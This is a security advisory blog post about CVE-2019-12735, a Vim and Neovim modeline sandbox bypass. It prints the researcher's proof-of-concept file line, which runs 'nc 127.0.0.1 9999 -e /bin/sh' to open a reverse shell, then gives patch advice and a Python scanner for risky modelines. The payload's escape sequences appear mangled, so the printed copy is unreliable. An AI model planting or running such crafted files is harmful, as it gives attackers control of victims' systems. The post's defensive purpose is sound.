This Security Flaw in Vim and Neovim Can Give Attackers Control of Your Systems

For businesses that have adopted a Linux-based operating system (OS), the terms 'Vim' and 'Neovim' are no longer foreign concepts. They are two of the most popular command-line text editors and come pre-installed with the majority of Linux-based operating systems. However, both applications have been found to have a critical flaw that could let an attacker compromise your system when you simply open a text file in one of them.

This flaw was first discovered by a security researcher named Armin Razmjou. He found that Vim before version 8.1.1365 and Neovim before version 0.3.6 are vulnerable to arbitrary code execution via modelines when a specially crafted text file is opened. The vulnerability is tracked as CVE-2019-12735.

The modeline feature allows users to specify custom editor options near the start or end of a file. For security reasons, only a subset of options is permitted in modelines, and if an option value contains an unsafe expression, that expression is evaluated in an isolated environment called the sandbox. However, the researcher found that the sandbox can still be bypassed with the ":source!" command. By bypassing the sandbox, attackers can gain control of your system remotely. Thus, it is crucial to be careful about which files you open in Vim and Neovim.

Armin demonstrated a realistic attack in which a reverse shell is launched as soon as the user opens the file. A file sent by an attacker would look similar to the one below:

```
root@test:~# cat shell.txt
```

**Opening File**

```
x1b[?7lx1bSNothing here.x1b:silent! w | call system(‘nohup nc 127.0.0.1 9999 -e /bin/sh &’) | redraw! | file | silent! # ” vim: set fen fdm=expr fde=assert_fails(‘set fde=x | source! %’) fdl=0: x16x1b[1Gx16x1b[KNothing here.”x16x1b[D n
```

**End of File**

Once you open the file above, the attacker's payload runs with your privileges and hands them control of your system, as seen in the GIF below:

To prevent such attacks, you have to update both applications to fixed releases, namely Vim patch 8.1.1365 and the fix released in Neovim v0.3.6. Additionally, there are three tips from Armin that users should follow to reduce the chance of being attacked:

  • Disable the modeline feature.
  • Disable "modelineexpr" to disallow expressions in modelines.
  • Use the "securemodelines" plugin, a secure alternative to Vim modelines.
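As an added check, not part of the original post or Armin's research, the following Python script inspects only the lines Vim would actually parse for modelines (the first and last five by default) and flags any that use expression-valued options, `foldmethod=expr`, or `:source!`, so a suspicious file can be triaged before it is opened. The option list and the sample inputs are my own assumptions, modelled on the proof of concept above.

```python
import re

# Vim parses this many lines at the top and bottom of a file for modelines
# (the default value of the 'modelines' option).
MODELINES = 5
# Options whose values Vim evaluates as expressions. Assumption: this list is
# illustrative, not Vim's complete set of expression-valued options.
EXPR_OPTIONS = {"fde", "foldexpr", "fdt", "foldtext", "inex", "includeexpr",
                "inde", "indentexpr", "fex", "formatexpr", "stl", "statusline"}
# A modeline marker must start the line or follow whitespace.
MODELINE_RE = re.compile(r"(?:^|\s)(?:vi|vim|Vi|Vim|ex):\s*(.*)$")
SET_FORM_RE = re.compile(r"^(?:set|se)\s+(.*)$")

def split_options(body):
    """Split a modeline body into option tokens for either syntax form."""
    m = SET_FORM_RE.match(body)
    if m:  # "set ...:" form: options end at the first unescaped ':'
        return re.split(r"(?<!\\):", m.group(1), maxsplit=1)[0].split()
    return [t for t in re.split(r"[\s:]+", body) if t]  # plain form

def scan_modelines(text):
    """Return (line_number, reason) pairs for risky modelines in text."""
    lines = text.splitlines()
    window = list(enumerate(lines, 1))
    if len(lines) > 2 * MODELINES:  # only the lines Vim would actually parse
        window = window[:MODELINES] + window[-MODELINES:]
    findings = []
    for lineno, line in window:
        m = MODELINE_RE.search(line)
        if not m:
            continue
        body, reasons = m.group(1), []
        if "source!" in body:
            reasons.append("modeline invokes :source!")
        for opt in split_options(body):
            name, _, value = opt.partition("=")
            if name in EXPR_OPTIONS:
                reasons.append(f"expression-valued option {name}")
            elif name in ("fdm", "foldmethod") and value == "expr":
                reasons.append("foldmethod=expr enables foldexpr evaluation")
        findings += [(lineno, r) for r in dict.fromkeys(reasons)]
    return findings

# Constructed sample modelled on the proof-of-concept above (terminal escape
# sequences and the system() call omitted), plus a harmless modeline.
SAMPLE = "\n".join(["Nothing here."] * 12 + [
    "\" vim: set fen fdm=expr fde=assert_fails('set fde=x | source! %') fdl=0:"])
BENIGN = "# vim: set ts=4 sw=4 et:\nprint('hello')\n"
```

Running `scan_modelines(SAMPLE)` reports the `:source!` call, `foldmethod=expr` and the `fde` option on line 13, while `BENIGN` produces no findings.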

As one of the IT security experts in Indonesia, Defender Nusa Semesta (DNS) hopes that this article informs, alerts and prepares you to address CVE-2019-12735 and stay safe from attacks.
